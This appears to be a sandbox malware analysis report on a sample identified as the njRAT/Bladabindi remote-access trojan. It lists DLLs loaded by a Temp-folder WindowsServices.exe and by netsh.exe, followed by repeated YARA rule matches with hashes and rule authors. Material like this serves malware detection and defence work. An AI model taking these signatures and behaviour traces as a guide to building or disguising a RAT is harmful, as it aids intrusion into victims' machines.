        Source: C:\Users\user\AppData\Local\Temp\WindowsServices.exeSection loaded: sspicli.dllJump to behavior
        Source: C:\Users\user\AppData\Local\Temp\WindowsServices.exeSection loaded: wbemcomn.dllJump to behavior
        Source: C:\Users\user\AppData\Local\Temp\WindowsServices.exeSection loaded: amsi.dllJump to behavior
        Source: C:\Users\user\AppData\Local\Temp\WindowsServices.exeSection loaded: userenv.dllJump to behavior
        Source: C:\Users\user\AppData\Local\Temp\WindowsServices.exeSection loaded: avicap32.dllJump to behavior
        Source: C:\Users\user\AppData\Local\Temp\WindowsServices.exeSection loaded: msvfw32.dllJump to behavior
        Source: C:\Users\user\AppData\Local\Temp\WindowsServices.exeSection loaded: winmm.dllJump to behavior
        Source: C:\Users\user\AppData\Local\Temp\WindowsServices.exeSection loaded: winmm.dllJump to behavior
        Source: C:\Users\user\AppData\Local\Temp\WindowsServices.exeSection loaded: sxs.dllJump to behavior
        Source: C:\Windows\SysWOW64\netsh.exeSection loaded: kernel.appcore.dllJump to behavior
        Source: C:\Windows\SysWOW64\netsh.exeSection loaded: ifmon.dllJump to behavior
        Source: C:\Windows\SysWOW64\netsh.exeSection loaded: iphlpapi.dllJump to behavior
        Source: C:\Windows\SysWOW64\netsh.exeSection loaded: mprapi.dllJump to behavior
        Source: C:\Windows\SysWOW64\netsh.exeSection loaded: rasmontr.dllJump to behavior
        Source: C:\Windows\SysWOW64\netsh.exeSection loaded: rasapi32.dllJump to behavior
        Source: C:\Windows\SysWOW64\netsh.exeSection loaded: fwpuclnt.dllJump to behavior
        Source: C:\Windows\SysWOW64\netsh.exeSection loaded: rasman.dllJump to behavior
        Source: C:\Windows\SysWOW64\netsh.exeSection loaded: mfc42u.dllJump to behavior
        Source: C:\Windows\SysWOW64\netsh.exeSection loaded: rasman.dllJump to behavior
        Source: C:\Windows\SysWOW64\netsh.exeSection loaded: authfwcfg.dllJump to behavior
        Source: C:\Windows\SysWOW64\netsh.exeSection loaded: fwpolicyiomgr.dllJump to behavior
        Source: C:\Windows\SysWOW64\netsh.exeSection loaded: firewallapi.dllJump to behavior
        Source: C:\Windows\SysWOW64\netsh.exeSection loaded: dnsapi.dllJump to behavior
        Source: C:\Windows\SysWOW64\netsh.exeSection loaded: fwbase.dllJump to behavior
        Source: C:\Windows\SysWOW64\netsh.exeSection loaded: dhcpcmonitor.dllJump to behavior
        Source: C:\Windows\SysWOW64\netsh.exeSection loaded: dot3cfg.dllJump to behavior
        Source: C:\Windows\SysWOW64\netsh.exeSection loaded: dot3api.dllJump to behavior
        Source: C:\Windows\SysWOW64\netsh.exeSection loaded: onex.dllJump to behavior
        Source: C:\Windows\SysWOW64\netsh.exeSection loaded: eappcfg.dllJump to behavior
        Source: C:\Windows\SysWOW64\netsh.exeSection loaded: ncrypt.dllJump to behavior
        Source: C:\Windows\SysWOW64\netsh.exeSection loaded: eappprxy.dllJump to behavior
        Source: C:\Windows\SysWOW64\netsh.exeSection loaded: ntasn1.dllJump to behavior
        Source: C:\Windows\SysWOW64\netsh.exeSection loaded: fwcfg.dllJump to behavior
        Source: C:\Windows\SysWOW64\netsh.exeSection loaded: hnetmon.dllJump to behavior
        Source: C:\Windows\SysWOW64\netsh.exeSection loaded: netshell.dllJump to behavior
        Source: C:\Windows\SysWOW64\netsh.exeSection loaded: nlaapi.dllJump to behavior
        Source: C:\Windows\SysWOW64\netsh.exeSection loaded: netsetupapi.dllJump to behavior
        Source: C:\Windows\SysWOW64\netsh.exeSection loaded: netiohlp.dllJump to behavior
        Source: C:\Windows\SysWOW64\netsh.exeSection loaded: dhcpcsvc.dllJump to behavior
        Source: C:\Windows\SysWOW64\netsh.exeSection loaded: winnsi.dllJump to behavior
        Source: C:\Windows\SysWOW64\netsh.exeSection loaded: nshhttp.dllJump to behavior
        Source: C:\Windows\SysWOW64\netsh.exeSection loaded: httpapi.dllJump to behavior
        Source: C:\Windows\SysWOW64\netsh.exeSection loaded: nshipsec.dllJump to behavior
        Source: C:\Windows\SysWOW64\netsh.exeSection loaded: userenv.dllJump to behavior
        Source: C:\Windows\SysWOW64\netsh.exeSection loaded: activeds.dllJump to behavior
        Source: C:\Windows\SysWOW64\netsh.exeSection loaded: polstore.dllJump to behavior
        Source: C:\Windows\SysWOW64\netsh.exeSection loaded: winipsec.dllJump to behavior
        Source: C:\Windows\SysWOW64\netsh.exeSection loaded: adsldpc.dllJump to behavior
        Source: C:\Windows\SysWOW64\netsh.exeSection loaded: adsldpc.dllJump to behavior
        Source: C:\Windows\SysWOW64\netsh.exeSection loaded: nshwfp.dllJump to behavior
        Source: C:\Windows\SysWOW64\netsh.exeSection loaded: cabinet.dllJump to behavior
        Source: C:\Windows\SysWOW64\netsh.exeSection loaded: p2pnetsh.dllJump to behavior
        Source: C:\Windows\SysWOW64\netsh.exeSection loaded: p2p.dllJump to behavior
        Source: C:\Windows\SysWOW64\netsh.exeSection loaded: profapi.dllJump to behavior
        Source: C:\Windows\SysWOW64\netsh.exeSection loaded: cryptbase.dllJump to behavior
        Source: C:\Windows\SysWOW64\netsh.exeSection loaded: rpcnsh.dllJump to behavior
        Source: C:\Windows\SysWOW64\netsh.exeSection loaded: whhelper.dllJump to behavior
        Source: C:\Windows\SysWOW64\netsh.exeSection loaded: winhttp.dllJump to behavior
        Source: C:\Windows\SysWOW64\netsh.exeSection loaded: wlancfg.dllJump to behavior
        Source: C:\Windows\SysWOW64\netsh.exeSection loaded: cryptsp.dllJump to behavior
        Source: C:\Windows\SysWOW64\netsh.exeSection loaded: wlanapi.dllJump to behavior
        Source: C:\Windows\SysWOW64\netsh.exeSection loaded: wshelper.dllJump to behavior
        Source: C:\Windows\SysWOW64\netsh.exeSection loaded: wevtapi.dllJump to behavior
        Source: C:\Windows\SysWOW64\netsh.exeSection loaded: mswsock.dllJump to behavior
        Source: C:\Windows\SysWOW64\netsh.exeSection loaded: peerdistsh.dllJump to behavior
        Source: C:\Windows\SysWOW64\netsh.exeSection loaded: uxtheme.dllJump to behavior
        Source: C:\Windows\SysWOW64\netsh.exeSection loaded: wcmapi.dllJump to behavior
        Source: C:\Windows\SysWOW64\netsh.exeSection loaded: rmclient.dllJump to behavior
        Source: C:\Windows\SysWOW64\netsh.exeSection loaded: mobilenetworking.dllJump to behavior
        Source: C:\Windows\SysWOW64\netsh.exeSection loaded: slc.dllJump to behavior
        Source: C:\Windows\SysWOW64\netsh.exeSection loaded: sppc.dllJump to behavior
        Source: C:\Windows\SysWOW64\netsh.exeSection loaded: gpapi.dllJump to behavior
        Source: C:\Windows\SysWOW64\netsh.exeSection loaded: ktmw32.dllJump to behavior
        Source: C:\Windows\SysWOW64\netsh.exeSection loaded: mprmsg.dllJump to behavior
        Source: C:\Windows\SysWOW64\netsh.exeSection loaded: windows.storage.dllJump to behavior
        Source: C:\Windows\SysWOW64\netsh.exeSection loaded: wldp.dllJump to behavior
        Source: C:\Windows\SysWOW64\netsh.exeSection loaded: msasn1.dllJump to behavior
        Source: C:\Users\user\AppData\Local\Temp\WindowsServices.exeSection loaded: mfc42.dllJump to behavior
        Source: C:\Users\user\AppData\Local\Temp\WindowsServices.exeSection loaded: uxtheme.dllJump to behavior
        Source: C:\Users\user\AppData\Local\Temp\WindowsServices.exeSection loaded: windows.storage.dllJump to behavior
        Source: C:\Users\user\AppData\Local\Temp\WindowsServices.exeSection loaded: wldp.dllJump to behavior
        Source: C:\Users\user\AppData\Local\Temp\WindowsServices.exeSection loaded: ntmarta.dllJump to behavior
        Source: C:\Users\user\AppData\Local\Temp\WindowsServices.exeSection loaded: mscoree.dllJump to behavior
        Source: C:\Users\user\AppData\Local\Temp\WindowsServices.exeSection loaded: kernel.appcore.dllJump to behavior
        Source: C:\Users\user\AppData\Local\Temp\WindowsServices.exeSection loaded: version.dllJump to behavior
        Source: C:\Users\user\AppData\Local\Temp\WindowsServices.exeSection loaded: windows.storage.dllJump to behavior
        Source: C:\Users\user\AppData\Local\Temp\WindowsServices.exeSection loaded: wldp.dllJump to behavior
        Source: C:\Users\user\AppData\Local\Temp\WindowsServices.exeSection loaded: profapi.dllJump to behavior
        Source: C:\Users\user\AppData\Local\Temp\WindowsServices.exeSection loaded: uxtheme.dllJump to behavior
        Source: C:\Users\user\AppData\Local\Temp\WindowsServices.exeSection loaded: cryptsp.dllJump to behavior
        Source: C:\Users\user\AppData\Local\Temp\WindowsServices.exeSection loaded: rsaenh.dllJump to behavior
        Source: C:\Users\user\AppData\Local\Temp\WindowsServices.exeSection loaded: cryptbase.dllJump to behavior
        Source: C:\Users\user\AppData\Local\Temp\WindowsServices.exeSection loaded: mfc42.dll
        Source: C:\Users\user\AppData\Local\Temp\WindowsServices.exeSection loaded: uxtheme.dll
        Source: C:\Users\user\AppData\Local\Temp\WindowsServices.exeSection loaded: windows.storage.dll
        Source: C:\Users\user\AppData\Local\Temp\WindowsServices.exeSection loaded: wldp.dll
        Source: C:\Users\user\AppData\Local\Temp\WindowsServices.exeSection loaded: ntmarta.dll
        Source: C:\Users\user\AppData\Local\Temp\WindowsServices.exeSection loaded: mscoree.dll
        Source: C:\Users\user\AppData\Local\Temp\WindowsServices.exeSection loaded: kernel.appcore.dll
        Source: C:\Users\user\AppData\Local\Temp\WindowsServices.exeSection loaded: version.dll
        Source: C:\Users\user\AppData\Local\Temp\WindowsServices.exeSection loaded: windows.storage.dll
        Source: C:\Users\user\AppData\Local\Temp\WindowsServices.exeSection loaded: wldp.dll
        Source: C:\Users\user\AppData\Local\Temp\WindowsServices.exeSection loaded: profapi.dll
        Source: C:\Users\user\AppData\Local\Temp\WindowsServices.exeSection loaded: uxtheme.dll
        Source: C:\Users\user\AppData\Local\Temp\WindowsServices.exeSection loaded: cryptsp.dll
        Source: C:\Users\user\AppData\Local\Temp\WindowsServices.exeSection loaded: rsaenh.dll
        Source: C:\Users\user\AppData\Local\Temp\WindowsServices.exeSection loaded: cryptbase.dll
        Source: C:\Users\user\AppData\Local\Temp\WindowsServices.exeSection loaded: mfc42.dll
        Source: C:\Users\user\AppData\Local\Temp\WindowsServices.exeSection loaded: uxtheme.dll
        Source: C:\Users\user\AppData\Local\Temp\WindowsServices.exeSection loaded: windows.storage.dll
        Source: C:\Users\user\AppData\Local\Temp\WindowsServices.exeSection loaded: wldp.dll
        Source: C:\Users\user\AppData\Local\Temp\WindowsServices.exeSection loaded: ntmarta.dll
        Source: C:\Users\user\AppData\Local\Temp\WindowsServices.exeSection loaded: mscoree.dll
        Source: C:\Users\user\AppData\Local\Temp\WindowsServices.exeSection loaded: kernel.appcore.dll
        Source: C:\Users\user\AppData\Local\Temp\WindowsServices.exeSection loaded: version.dll
        Source: C:\Users\user\AppData\Local\Temp\WindowsServices.exeSection loaded: windows.storage.dll
        Source: C:\Users\user\AppData\Local\Temp\WindowsServices.exeSection loaded: wldp.dll
        Source: C:\Users\user\AppData\Local\Temp\WindowsServices.exeSection loaded: profapi.dll
        Source: C:\Users\user\AppData\Local\Temp\WindowsServices.exeSection loaded: uxtheme.dll
        Source: C:\Users\user\AppData\Local\Temp\WindowsServices.exeSection loaded: cryptsp.dll
        Source: C:\Users\user\AppData\Local\Temp\WindowsServices.exeSection loaded: rsaenh.dll
        Source: C:\Users\user\AppData\Local\Temp\WindowsServices.exeSection loaded: cryptbase.dll
        Source: iR2UtZj5vP.exeStatic PE information: RELOCS_STRIPPED, EXECUTABLE_IMAGE, LINE_NUMS_STRIPPED, LOCAL_SYMS_STRIPPED, 32BIT_MACHINE
        Source: 18.2.WindowsServices.exe.25c0000.2.raw.unpack, type: UNPACKEDPEMatched rule: Windows_Trojan_Njrat_30f3c220 reference_sample = 741a0f3954499c11f9eddc8df7c31e7c59ca41f1a7005646735b8b1d53438c1b, os = windows, severity = x86, creation_date = 2021-06-13, scan_context = file, memory, license = Elastic License v2, threat_name = Windows.Trojan.Njrat, fingerprint = d15e131bca6beddcaecb20fffaff1784ad8a33a25e7ce90f7450d1a362908cc4, id = 30f3c220-b8dc-45a1-bcf0-027c2f76fa63, last_modified = 2021-10-04
        Source: 18.2.WindowsServices.exe.25c0000.2.raw.unpack, type: UNPACKEDPEMatched rule: CN_disclosed_20180208_c date = 2018-02-08, hash1 = 17475d25d40c877284e73890a9dd55fccedc6a5a071c351a8c342c8ef7f9cea7, author = Florian Roth, description = Detects malware from disclosed CN malware set, reference = https://twitter.com/cyberintproject/status/961714165550342146, license = https://creativecommons.org/licenses/by-nc/4.0/
        Source: 18.2.WindowsServices.exe.25c0000.2.raw.unpack, type: UNPACKEDPEMatched rule: njrat1 date = 2015-05-27, author = Brian Wallace @botnet_hunter, description = Identify njRat, author_email = bwall@ballastsecurity.net
        Source: 18.2.WindowsServices.exe.25c0000.2.raw.unpack, type: UNPACKEDPEMatched rule: Njrat hash1 = d5f63213ce11798879520b0e9b0d1b68d55f7727758ec8c120e370699a41379d, author = JPCERT/CC Incident Response Group, description = detect njRAT in memory, rule_usage = memory scan
        Source: 18.2.WindowsServices.exe.25c0000.2.raw.unpack, type: UNPACKEDPEMatched rule: MALWARE_Win_NjRAT author = ditekSHen, description = Detects NjRAT / Bladabindi
        Source: 4.2.iR2UtZj5vP.exe.400000.0.unpack, type: UNPACKEDPEMatched rule: Windows_Trojan_Njrat_30f3c220 reference_sample = 741a0f3954499c11f9eddc8df7c31e7c59ca41f1a7005646735b8b1d53438c1b, os = windows, severity = x86, creation_date = 2021-06-13, scan_context = file, memory, license = Elastic License v2, threat_name = Windows.Trojan.Njrat, fingerprint = d15e131bca6beddcaecb20fffaff1784ad8a33a25e7ce90f7450d1a362908cc4, id = 30f3c220-b8dc-45a1-bcf0-027c2f76fa63, last_modified = 2021-10-04
        Source: 4.2.iR2UtZj5vP.exe.400000.0.unpack, type: UNPACKEDPEMatched rule: CN_disclosed_20180208_c date = 2018-02-08, hash1 = 17475d25d40c877284e73890a9dd55fccedc6a5a071c351a8c342c8ef7f9cea7, author = Florian Roth, description = Detects malware from disclosed CN malware set, reference = https://twitter.com/cyberintproject/status/961714165550342146, license = https://creativecommons.org/licenses/by-nc/4.0/
        Source: 4.2.iR2UtZj5vP.exe.400000.0.unpack, type: UNPACKEDPEMatched rule: njrat1 date = 2015-05-27, author = Brian Wallace @botnet_hunter, description = Identify njRat, author_email = bwall@ballastsecurity.net
        Source: 4.2.iR2UtZj5vP.exe.400000.0.unpack, type: UNPACKEDPEMatched rule: Njrat hash1 = d5f63213ce11798879520b0e9b0d1b68d55f7727758ec8c120e370699a41379d, author = JPCERT/CC Incident Response Group, description = detect njRAT in memory, rule_usage = memory scan
        Source: 4.2.iR2UtZj5vP.exe.400000.0.unpack, type: UNPACKEDPEMatched rule: MALWARE_Win_NjRAT author = ditekSHen, description = Detects NjRAT / Bladabindi
        Source: 18.2.WindowsServices.exe.25c0000.2.unpack, type: UNPACKEDPEMatched rule: Windows_Trojan_Njrat_30f3c220 reference_sample = 741a0f3954499c11f9eddc8df7c31e7c59ca41f1a7005646735b8b1d53438c1b, os = windows, severity = x86, creation_date = 2021-06-13, scan_context = file, memory, license = Elastic License v2, threat_name = Windows.Trojan.Njrat, fingerprint = d15e131bca6beddcaecb20fffaff1784ad8a33a25e7ce90f7450d1a362908cc4, id = 30f3c220-b8dc-45a1-bcf0-027c2f76fa63, last_modified = 2021-10-04
        Source: 18.2.WindowsServices.exe.25c0000.2.unpack, type: UNPACKEDPEMatched rule: CN_disclosed_20180208_c date = 2018-02-08, hash1 = 17475d25d40c877284e73890a9dd55fccedc6a5a071c351a8c342c8ef7f9cea7, author = Florian Roth, description = Detects malware from disclosed CN malware set, reference = https://twitter.com/cyberintproject/status/961714165550342146, license = https://creativecommons.org/licenses/by-nc/4.0/
        Source: 18.2.WindowsServices.exe.25c0000.2.unpack, type: UNPACKEDPEMatched rule: njrat1 date = 2015-05-27, author = Brian Wallace @botnet_hunter, description = Identify njRat, author_email = bwall@ballastsecurity.net
        Source: 18.2.WindowsServices.exe.25c0000.2.unpack, type: UNPACKEDPEMatched rule: Njrat hash1 = d5f63213ce11798879520b0e9b0d1b68d55f7727758ec8c120e370699a41379d, author = JPCERT/CC Incident Response Group, description = detect njRAT in memory, rule_usage = memory scan
        Source: 18.2.WindowsServices.exe.25c0000.2.unpack, type: UNPACKEDPEMatched rule: MALWARE_Win_NjRAT author = ditekSHen, description = Detects NjRAT / Bladabindi
        Source: 1.2.iR2UtZj5vP.exe.2160000.3.unpack, type: UNPACKEDPEMatched rule: Windows_Trojan_Njrat_30f3c220 reference_sample = 741a0f3954499c11f9eddc8df7c31e7c59ca41f1a7005646735b8b1d53438c1b, os = windows, severity = x86, creation_date = 2021-06-13, scan_context = file, memory, license = Elastic License v2, threat_name = Windows.Trojan.Njrat, fingerprint = d15e131bca6beddcaecb20fffaff1784ad8a33a25e7ce90f7450d1a362908cc4, id = 30f3c220-b8dc-45a1-bcf0-027c2f76fa63, last_modified = 2021-10-04
        Source: 1.2.iR2UtZj5vP.exe.2160000.3.unpack, type: UNPACKEDPEMatched rule: CN_disclosed_20180208_c date = 2018-02-08, hash1 = 17475d25d40c877284e73890a9dd55fccedc6a5a071c351a8c342c8ef7f9cea7, author = Florian Roth, description = Detects malware from disclosed CN malware set, reference = https://twitter.com/cyberintproject/status/961714165550342146, license = https://creativecommons.org/licenses/by-nc/4.0/
        Source: 1.2.iR2UtZj5vP.exe.2160000.3.unpack, type: UNPACKEDPEMatched rule: njrat1 date = 2015-05-27, author = Brian Wallace @botnet_hunter, description = Identify njRat, author_email = bwall@ballastsecurity.net
        Source: 1.2.iR2UtZj5vP.exe.2160000.3.unpack, type: UNPACKEDPEMatched rule: Njrat hash1 = d5f63213ce11798879520b0e9b0d1b68d55f7727758ec8c120e370699a41379d, author = JPCERT/CC Incident Response Group, description = detect njRAT in memory, rule_usage = memory scan
        Source: 1.2.iR2UtZj5vP.exe.2160000.3.unpack, type: UNPACKEDPEMatched rule: MALWARE_Win_NjRAT author = ditekSHen, description = Detects NjRAT / Bladabindi
        Source: 8.1.WindowsServices.exe.400000.0.unpack, type: UNPACKEDPEMatched rule: Windows_Trojan_Njrat_30f3c220 reference_sample = 741a0f3954499c11f9eddc8df7c31e7c59ca41f1a7005646735b8b1d53438c1b, os = windows, severity = x86, creation_date = 2021-06-13, scan_context = file, memory, license = Elastic License v2, threat_name = Windows.Trojan.Njrat, fingerprint = d15e131bca6beddcaecb20fffaff1784ad8a33a25e7ce90f7450d1a362908cc4, id = 30f3c220-b8dc-45a1-bcf0-027c2f76fa63, last_modified = 2021-10-04
        Source: 8.1.WindowsServices.exe.400000.0.unpack, type: UNPACKEDPEMatched rule: CN_disclosed_20180208_c date = 2018-02-08, hash1 = 17475d25d40c877284e73890a9dd55fccedc6a5a071c351a8c342c8ef7f9cea7, author = Florian Roth, description = Detects malware from disclosed CN malware set, reference = https://twitter.com/cyberintproject/status/961714165550342146, license = https://creativecommons.org/licenses/by-nc/4.0/
        Source: 8.1.WindowsServices.exe.400000.0.unpack, type: UNPACKEDPEMatched rule: njrat1 date = 2015-05-27, author = Brian Wallace @botnet_hunter, description = Identify njRat, author_email = bwall@ballastsecurity.net
        Source: 8.1.WindowsServices.exe.400000.0.unpack, type: UNPACKEDPEMatched rule: Njrat hash1 = d5f63213ce11798879520b0e9b0d1b68d55f7727758ec8c120e370699a41379d, author = JPCERT/CC Incident Response Group, description = detect njRAT in memory, rule_usage = memory scan
        Source: 8.1.WindowsServices.exe.400000.0.unpack, type: UNPACKEDPEMatched rule: MALWARE_Win_NjRAT author = ditekSHen, description = Detects NjRAT / Bladabindi
        Source: 17.1.WindowsServices.exe.400000.0.unpack, type: UNPACKEDPEMatched rule: Windows_Trojan_Njrat_30f3c220 reference_sample = 741a0f3954499c11f9eddc8df7c31e7c59ca41f1a7005646735b8b1d53438c1b, os = windows, severity = x86, creation_date = 2021-06-13, scan_context = file, memory, license = Elastic License v2, threat_name = Windows.Trojan.Njrat, fingerprint = d15e131bca6beddcaecb20fffaff1784ad8a33a25e7ce90f7450d1a362908cc4, id = 30f3c220-b8dc-45a1-bcf0-027c2f76fa63, last_modified = 2021-10-04
        Source: 17.1.WindowsServices.exe.400000.0.unpack, type: UNPACKEDPEMatched rule: CN_disclosed_20180208_c date = 2018-02-08, hash1 = 17475d25d40c877284e73890a9dd55fccedc6a5a071c351a8c342c8ef7f9cea7, author = Florian Roth, description = Detects malware from disclosed CN malware set, reference = https://twitter.com/cyberintproject/status/961714165550342146, license = https://creativecommons.org/licenses/by-nc/4.0/
        Source: 17.1.WindowsServices.exe.400000.0.unpack, type: UNPACKEDPEMatched rule: njrat1 date = 2015-05-27, author = Brian Wallace @botnet_hunter, description = Identify njRat, author_email = bwall@ballastsecurity.net
        Source: 17.1.WindowsServices.exe.400000.0.unpack, type: UNPACKEDPEMatched rule: Njrat hash1 = d5f63213ce11798879520b0e9b0d1b68d55f7727758ec8c120e370699a41379d, author = JPCERT/CC Incident Response Group, description = detect njRAT in memory, rule_usage = memory scan
        Source: 17.1.WindowsServices.exe.400000.0.unpack, type: UNPACKEDPEMatched rule: MALWARE_Win_NjRAT author = ditekSHen, description = Detects NjRAT / Bladabindi
        Source: 17.2.WindowsServices.exe.400000.0.unpack, type: UNPACKEDPEMatched rule: Windows_Trojan_Njrat_30f3c220 reference_sample = 741a0f3954499c11f9eddc8df7c31e7c59ca41f1a7005646735b8b1d53438c1b, os = windows, severity = x86, creation_date = 2021-06-13, scan_context = file, memory, license = Elastic License v2, threat_name = Windows.Trojan.Njrat, fingerprint = d15e131bca6beddcaecb20fffaff1784ad8a33a25e7ce90f7450d1a362908cc4, id = 30f3c220-b8dc-45a1-bcf0-027c2f76fa63, last_modified = 2021-10-04
        Source: 17.2.WindowsServices.exe.400000.0.unpack, type: UNPACKEDPEMatched rule: CN_disclosed_20180208_c date = 2018-02-08, hash1 = 17475d25d40c877284e73890a9dd55fccedc6a5a071c351a8c342c8ef7f9cea7, author = Florian Roth, description = Detects malware from disclosed CN malware set, reference = https://twitter.com/cyberintproject/status/961714165550342146, license = https://creativecommons.org/licenses/by-nc/4.0/
        Source: 17.2.WindowsServices.exe.400000.0.unpack, type: UNPACKEDPEMatched rule: njrat1 date = 2015-05-27, author = Brian Wallace @botnet_hunter, description = Identify njRat, author_email = bwall@ballastsecurity.net
        Source: 17.2.WindowsServices.exe.400000.0.unpack, type: UNPACKEDPEMatched rule: Njrat hash1 = d5f63213ce11798879520b0e9b0d1b68d55f7727758ec8c120e370699a41379d, author = JPCERT/CC Incident Response Group, description = detect njRAT in memory, rule_usage = memory scan
        Source: 17.2.WindowsServices.exe.400000.0.unpack, type: UNPACKEDPEMatched rule: MALWARE_Win_NjRAT author = ditekSHen, description = Detects NjRAT / Bladabindi
        Source: 22.2.WindowsServices.exe.2150000.2.raw.unpack, type: UNPACKEDPEMatched rule: Windows_Trojan_Njrat_30f3c220 reference_sample = 741a0f3954499c11f9eddc8df7c31e7c59ca41f1a7005646735b8b1d53438c1b, os = windows, severity = x86, creation_date = 2021-06-13, scan_context = file, memory, license = Elastic License v2, threat_name = Windows.Trojan.Njrat, fingerprint = d15e131bca6beddcaecb20fffaff1784ad8a33a25e7ce90f7450d1a362908cc4, id = 30f3c220-b8dc-45a1-bcf0-027c2f76fa63, last_modified = 2021-10-04
        Source: 22.2.WindowsServices.exe.2150000.2.raw.unpack, type: UNPACKEDPEMatched rule: CN_disclosed_20180208_c date = 2018-02-08, hash1 = 17475d25d40c877284e73890a9dd55fccedc6a5a071c351a8c342c8ef7f9cea7, author = Florian Roth, description = Detects malware from disclosed CN malware set, reference = https://twitter.com/cyberintproject/status/961714165550342146, license = https://creativecommons.org/licenses/by-nc/4.0/
        Source: 22.2.WindowsServices.exe.2150000.2.raw.unpack, type: UNPACKEDPEMatched rule: njrat1 date = 2015-05-27, author = Brian Wallace @botnet_hunter, description = Identify njRat, author_email = bwall@ballastsecurity.net
        Source: 22.2.WindowsServices.exe.2150000.2.raw.unpack, type: UNPACKEDPEMatched rule: Njrat hash1 = d5f63213ce11798879520b0e9b0d1b68d55f7727758ec8c120e370699a41379d, author = JPCERT/CC Incident Response Group, description = detect njRAT in memory, rule_usage = memory scan
        Source: 22.2.WindowsServices.exe.2150000.2.raw.unpack, type: UNPACKEDPEMatched rule: MALWARE_Win_NjRAT author = ditekSHen, description = Detects NjRAT / Bladabindi
        Source: 18.2.WindowsServices.exe.2590000.1.unpack, type: UNPACKEDPEMatched rule: Windows_Trojan_Njrat_30f3c220 reference_sample = 741a0f3954499c11f9eddc8df7c31e7c59ca41f1a7005646735b8b1d53438c1b, os = windows, severity = x86, creation_date = 2021-06-13, scan_context = file, memory, license = Elastic License v2, threat_name = Windows.Trojan.Njrat, fingerprint = d15e131bca6beddcaecb20fffaff1784ad8a33a25e7ce90f7450d1a362908cc4, id = 30f3c220-b8dc-45a1-bcf0-027c2f76fa63, last_modified = 2021-10-04
        Source: 18.2.WindowsServices.exe.2590000.1.unpack, type: UNPACKEDPEMatched rule: njrat1 date = 2015-05-27, author = Brian Wallace @botnet_hunter, description = Identify njRat, author_email = bwall@ballastsecurity.net
        Source: 18.2.WindowsServices.exe.2590000.1.unpack, type: UNPACKEDPEMatched rule: Njrat hash1 = d5f63213ce11798879520b0e9b0d1b68d55f7727758ec8c120e370699a41379d, author = JPCERT/CC Incident Response Group, description = detect njRAT in memory, rule_usage = memory scan
        Source: 18.2.WindowsServices.exe.2590000.1.unpack, type: UNPACKEDPEMatched rule: MALWARE_Win_NjRAT author = ditekSHen, description = Detects NjRAT / Bladabindi
        Source: 25.2.WindowsServices.exe.400000.0.unpack, type: UNPACKEDPEMatched rule: Windows_Trojan_Njrat_30f3c220 reference_sample = 741a0f3954499c11f9eddc8df7c31e7c59ca41f1a7005646735b8b1d53438c1b, os = windows, severity = x86, creation_date = 2021-06-13, scan_context = file, memory, license = Elastic License v2, threat_name = Windows.Trojan.Njrat, fingerprint = d15e131bca6beddcaecb20fffaff1784ad8a33a25e7ce90f7450d1a362908cc4, id = 30f3c220-b8dc-45a1-bcf0-027c2f76fa63, last_modified = 2021-10-04
        Source: 25.2.WindowsServices.exe.400000.0.unpack, type: UNPACKEDPEMatched rule: CN_disclosed_20180208_c date = 2018-02-08, hash1 = 17475d25d40c877284e73890a9dd55fccedc6a5a071c351a8c342c8ef7f9cea7, author = Florian Roth, description = Detects malware from disclosed CN malware set, reference = https://twitter.com/cyberintproject/status/961714165550342146, license = https://creativecommons.org/licenses/by-nc/4.0/
        Source: 25.2.WindowsServices.exe.400000.0.unpack, type: UNPACKEDPEMatched rule: njrat1 date = 2015-05-27, author = Brian Wallace @botnet_hunter, description = Identify njRat, author_email = bwall@ballastsecurity.net
        Source: 25.2.WindowsServices.exe.400000.0.unpack, type: UNPACKEDPEMatched rule: Njrat hash1 = d5f63213ce11798879520b0e9b0d1b68d55f7727758ec8c120e370699a41379d, author = JPCERT/CC Incident Response Group, description = detect njRAT in memory, rule_usage = memory scan
        Source: 25.2.WindowsServices.exe.400000.0.unpack, type: UNPACKEDPEMatched rule: MALWARE_Win_NjRAT author = ditekSHen, description = Detects NjRAT / Bladabindi
        Source: 5.2.WindowsServices.exe.4f0000.1.raw.unpack, type: UNPACKEDPEMatched rule: Windows_Trojan_Njrat_30f3c220 reference_sample = 741a0f3954499c11f9eddc8df7c31e7c59ca41f1a7005646735b8b1d53438c1b, os = windows, severity = x86, creation_date = 2021-06-13, scan_context = file, memory, license = Elastic License v2, threat_name = Windows.Trojan.Njrat, fingerprint = d15e131bca6beddcaecb20fffaff1784ad8a33a25e7ce90f7450d1a362908cc4, id = 30f3c220-b8dc-45a1-bcf0-027c2f76fa63, last_modified = 2021-10-04
        Source: 5.2.WindowsServices.exe.4f0000.1.raw.unpack, type: UNPACKEDPEMatched rule: CN_disclosed_20180208_c date = 2018-02-08, hash1 = 17475d25d40c877284e73890a9dd55fccedc6a5a071c351a8c342c8ef7f9cea7, author = Florian Roth, description = Detects malware from disclosed CN malware set, reference = https://twitter.com/cyberintproject/status/961714165550342146, license = https://creativecommons.org/licenses/by-nc/4.0/
        Source: 5.2.WindowsServices.exe.4f0000.1.raw.unpack, type: UNPACKEDPEMatched rule: njrat1 date = 2015-05-27, author = Brian Wallace @botnet_hunter, description = Identify njRat, author_email = bwall@ballastsecurity.net
        Source: 5.2.WindowsServices.exe.4f0000.1.raw.unpack, type: UNPACKEDPEMatched rule: Njrat hash1 = d5f63213ce11798879520b0e9b0d1b68d55f7727758ec8c120e370699a41379d, author = JPCERT/CC Incident Response Group, description = detect njRAT in memory, rule_usage = memory scan
        Source: 5.2.WindowsServices.exe.4f0000.1.raw.unpack, type: UNPACKEDPEMatched rule: MALWARE_Win_NjRAT author = ditekSHen, description = Detects NjRAT / Bladabindi
        Source: 21.2.WindowsServices.exe.400000.0.unpack, type: UNPACKEDPEMatched rule: Windows_Trojan_Njrat_30f3c220 reference_sample = 741a0f3954499c11f9eddc8df7c31e7c59ca41f1a7005646735b8b1d53438c1b, os = windows, severity = x86, creation_date = 2021-06-13, scan_context = file, memory, license = Elastic License v2, threat_name = Windows.Trojan.Njrat, fingerprint = d15e131bca6beddcaecb20fffaff1784ad8a33a25e7ce90f7450d1a362908cc4, id = 30f3c220-b8dc-45a1-bcf0-027c2f76fa63, last_modified = 2021-10-04
        Source: 21.2.WindowsServices.exe.400000.0.unpack, type: UNPACKEDPEMatched rule: CN_disclosed_20180208_c date = 2018-02-08, hash1 = 17475d25d40c877284e73890a9dd55fccedc6a5a071c351a8c342c8ef7f9cea7, author = Florian Roth, description = Detects malware from disclosed CN malware set, reference = https://twitter.com/cyberintproject/status/961714165550342146, license = https://creativecommons.org/licenses/by-nc/4.0/
